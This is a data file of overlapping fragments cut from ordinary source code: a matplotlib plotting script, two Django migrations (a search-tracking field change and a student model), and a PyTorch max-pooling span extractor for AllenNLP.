('Plot_%s_%s_%s.pdf' % (type, function, 
time)) plt.savefig(os.path.join(output_path, plot_file), bbox_inches='tight')", "= 'k' rcParams['grid.color'] = 'k' rcParams['grid.linestyle'] = ':' rcParams['grid.linewidth'] = 0.5 rcParams['axes.linewidth'] =", "= args.function popsize = 10 data_LTO = {} data_CSA = {} with open(lto_path)", "num_feval = generations * popsize plt.tick_params(axis='x', which='minor') plt.legend(loc=0, fontsize=25, ncol=2) plt.xlabel(\"Num FEval\", fontsize=50)" ]
[ "= [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free", "class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking',", "2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20),", "] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']],", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations", "# Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models", "models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField(", "<reponame>invinst/CPDBv2_backend<gh_stars>10-100 # Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations,", "= [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20), ),", "dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text',", "'0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No", "from django.db import 
migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ]", "on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [", "Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type',", "[ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction', 'No Interaction']], max_length=20), ), ]", "[ ('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'],", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations =", "migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'), ] operations = [", "('analytics', '0003_searchtracking'), ] operations = [ migrations.AlterField( model_name='searchtracking', name='query_type', field=models.CharField(choices=[['free_text', 'Free Text'], ['no_interaction',", "Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics', '0003_searchtracking'),", "Generated by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class", "by Django 2.1.3 on 2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration):", "2018-11-23 08:18 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('analytics'," ]
[ "<filename>LaureatsBackEnd-master/laureats/migrations/0008_etudiant.py # Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations,", "[ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE,", "parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ],", "migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations", "to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'],", "django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'),", "from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats',", "models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations =", "('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], },", "3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration):", "= [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, 
on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement',", "models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',),", "class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant',", "] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False,", "Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import", "[ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='',", "migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)),", "('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)),", "operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')),", 
"models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription',", "Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class", "primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={", "name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude',", "('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True,", "max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',), ),", "on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies", "# Generated by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models", "import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ]", "= [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True,", "import 
django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [", "2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies =", "django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel(", "('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering': ['new_date_inscription'], }, bases=('laureats.laureat',), ), ]", "Migration(migrations.Migration): dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[", "fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='',", "on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()),", "by Django 3.0.2 on 2020-01-10 20:43 from django.db import migrations, models import django.db.models.deletion", "dependencies = [ ('laureats', '0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr',", "'0007_laureat_filiere'), ] operations = [ migrations.CreateModel( name='Etudiant', fields=[ ('laureat_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True,", "20:43 from django.db import migrations, models import django.db.models.deletion class 
Migration(migrations.Migration): dependencies = [", "serialize=False, to='laureats.Laureat')), ('etablissement', models.CharField(default='', max_length=100)), ('sujet_etude', models.CharField(default='', max_length=255)), ('new_date_inscription', models.DateField()), ], options={ 'ordering':" ]
[ "import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def", "torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) ->", "torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends =", "# It's not strictly necessary to multiply the span indices by the mask", "import torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import", "elif num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To", "span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask =", "def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None,", "* span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) #", "= span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor,", "None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor,", "def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim()", "overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn", "None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width", "import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( 
self, input_dim: int,", "or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span width embedding", "dim=-1)] if span_indices_mask is not None: # It's not strictly necessary to multiply", "-> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None:", "def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is", "get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return", "False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths =", "num_width_embeddings is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use", "span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask", "None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings", "span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None:", "by the mask here, # but it's possible that the span representation was", "input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool =", "# but it's possible that the span representation was padded with something other", "span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed", "torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size,", "num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings =", "@overrides def forward( self, 
sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask:", "None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for", "not strictly necessary to multiply the span indices by the mask here, #", "allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks", "span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends", "# than 0 (such as -1, which would be an invalid index), so", "so we do so anyway to # be safe. span_starts = span_starts *", "span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to", "set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num,", "span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is", "-> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if", "- span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths)", "mask here, # but it's possible that the span representation was padded with", "self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor,", "embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings", "self._bucket_widths = bucket_widths if num_width_embeddings is not None 
and span_width_embedding_dim is not None:", "span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None:", "span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num,", "widths and concatenate to the rest of the representations. if self._bucket_widths: span_widths =", "ConfigurationError( \"To use a span width embedding representation, you must\" \"specify both num_width_buckets", "index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly", "to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends -", "class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int", "None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding", "<filename>spanmb/models/span_extractor.py import torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor", "util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings:", "overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util", "[index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's", "from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from", "torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: # Embed the span", "if span_indices_mask is not None: # It's not 
strictly necessary to multiply the", "num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings,", "for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not", "necessary to multiply the span indices by the mask here, # but it's", "super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is", "Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__(", "sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape", "representation was padded with something other # than 0 (such as -1, which", "# [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask", "It's not strictly necessary to multiply the span indices by the mask here,", "# [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is", "self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor", "span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings *", "MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int =", "span widths and concatenate to the rest of the representations. 
if self._bucket_widths: span_widths", "if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding(", "def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor", "so anyway to # be safe. span_starts = span_starts * span_indices_mask span_ends =", "= util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts", "a span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" )", "span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly necessary to", "shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if", "util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings", "span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings =", "torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1) return", "* span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if", "forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor =", "= [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not None: #", "in span_indices.split(1, dim=-1)] if span_indices_mask is not None: # It's not strictly necessary", "\"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def 
get_input_dim(self) ->", "and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings", "would be an invalid index), so we do so anyway to # be", "we do so anyway to # be safe. span_starts = span_starts * span_indices_mask", "util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float()", "to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings =", "= torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1)", ") else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self)", "other # than 0 (such as -1, which would be an invalid index),", "torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding", "= span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] #", "an invalid index), so we do so anyway to # be safe. 
span_starts", "use a span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\"", "span_starts * span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size]", "than 0 (such as -1, which would be an invalid index), so we", "else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings],", "padded with something other # than 0 (such as -1, which would be", "num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False, )", "bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is not None: self._span_width_embedding =", "span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends - span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings", "allennlp.nn import util from allennlp.common.checks import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim:", "None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings", "span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends -", "num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is", "self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None,", "not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor:", "not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif 
num_width_embeddings is not None", "\"To use a span width embedding representation, you must\" \"specify both num_width_buckets and", "strictly necessary to multiply the span indices by the mask here, # but", "here, # but it's possible that the span representation was padded with something", "# set unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size,", "the span widths and concatenate to the rest of the representations. if self._bucket_widths:", "self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths = span_ends", "be safe. span_starts = span_starts * span_indices_mask span_ends = span_ends * span_indices_mask #", "but it's possible that the span representation was padded with something other #", "concatenate to the rest of the representations. if self._bucket_widths: span_widths = util.bucket_values( span_ends", "ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim:", "sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None, span_indices_mask: torch.BoolTensor = None, )", "span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if span_indices_mask is not", "of the representations. 
if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings )", "must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self)", "torch from torch.nn.parameter import Parameter from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor", "= num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None and span_width_embedding_dim is", "from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import ConfigurationError class", "None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None: super().__init__()", "is not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a", "= False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths", "the representations. 
if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else:", "import ConfigurationError class MaxSpanExtractor(SpanExtractor): def __init__( self, input_dim: int, num_width_embeddings: int = None,", "span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask is not", "= None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans)", "span_width_embedding_dim: int = None, bucket_widths: bool = False, ) -> None: super().__init__() self._input_dim", "span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask", "= input_dim self._num_width_embeddings = num_width_embeddings self._bucket_widths = bucket_widths if num_width_embeddings is not None", "= Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or span_width_embedding_dim is", "embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding =", "num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return", "and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim", "you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None def", "else: self._span_width_embedding = None def get_input_dim(self) -> int: return self._input_dim def get_output_dim(self) ->", "None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1,", "int: if self._span_width_embedding is not None: return self._input_dim + self._span_width_embedding.get_output_dim() return self._input_dim @overrides", 
"import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from allennlp.nn import util from allennlp.common.checks import", "invalid index), so we do so anyway to # be safe. span_starts =", "multiply the span indices by the mask here, # but it's possible that", "return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim", "not None or span_width_embedding_dim is not None: raise ConfigurationError( \"To use a span", "span indices by the mask here, # but it's possible that the span", "something other # than 0 (such as -1, which would be an invalid", "int = None, span_width_embedding_dim: int = None, bucket_widths: bool = False, ) ->", "+ self._span_width_embedding.get_output_dim() return self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask:", "= None, ) -> None: # shape (batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1)", "* span_indices_mask span_ends = span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings,", "representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else: self._span_width_embedding = None", "None, span_indices_mask: torch.BoolTensor = None, ) -> None: # shape (batch_size, num_spans) span_starts,", "to multiply the span indices by the mask here, # but it's possible", "int: return self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return", "span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices) # set unmask embeddings to 0 span_embeddings =", "indices by the mask here, # but it's possible that the span representation", "representations. 
if self._bucket_widths: span_widths = util.bucket_values( span_ends - span_starts, num_total_buckets=self._num_width_embeddings ) else: span_widths", "it's possible that the span representation was padded with something other # than", "self._input_dim @overrides def forward( self, sequence_tensor: torch.FloatTensor, span_indices: torch.LongTensor, sequence_mask: torch.BoolTensor = None,", "None and span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif", "None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim ) elif num_width_embeddings is not None or", "(batch_size, num_spans) span_starts, span_ends = [index.squeeze(-1) for index in span_indices.split(1, dim=-1)] if span_indices_mask", "2)[0] # span_mask if self._span_width_embedding is not None: # Embed the span widths", "from overrides import overrides from allennlp.modules.span_extractors.span_extractor import SpanExtractor from allennlp.modules.token_embedders.embedding import Embedding from", "bool = False, ) -> None: super().__init__() self._input_dim = input_dim self._num_width_embeddings = num_width_embeddings", "emb_size] span_max_embeddings = torch.max(span_embeddings, 2)[0] # span_mask if self._span_width_embedding is not None: #", "span_ends * span_indices_mask # [batch_size, span_num, max_span_width, emb_size] span_embeddings, span_mask = util.batched_span_select(sequence_tensor, span_indices)", "is not None: # Embed the span widths and concatenate to the rest", "span_width_embeddings], -1) if span_indices_mask is not None: return span_max_embeddings * span_indices_mask.unsqueeze(-1) return span_max_embeddings", "if self._span_width_embedding is not None: # Embed the span widths and concatenate to", "self._input_dim def get_output_dim(self) -> int: if self._span_width_embedding is not None: return self._input_dim +", "not None and 
span_width_embedding_dim is not None: self._span_width_embedding = Embedding( num_embeddings=num_width_embeddings, embedding_dim=span_width_embedding_dim )", "the span representation was padded with something other # than 0 (such as", "__init__( self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths:", "with something other # than 0 (such as -1, which would be an", "self._span_width_embedding is not None: # Embed the span widths and concatenate to the", "unmask embeddings to 0 span_embeddings = span_embeddings * span_mask.unsqueeze(-1).float() # [batch_size, span_num, emb_size]", "possible that the span representation was padded with something other # than 0", "self, input_dim: int, num_width_embeddings: int = None, span_width_embedding_dim: int = None, bucket_widths: bool", "span width embedding representation, you must\" \"specify both num_width_buckets and span_width_embedding_dim.\" ) else:", "which would be an invalid index), so we do so anyway to #", "be an invalid index), so we do so anyway to # be safe.", "span_mask if self._span_width_embedding is not None: # Embed the span widths and concatenate", "- span_starts span_width_embeddings = self._span_width_embedding(span_widths) span_max_embeddings = torch.cat([span_max_embeddings, span_width_embeddings], -1) if 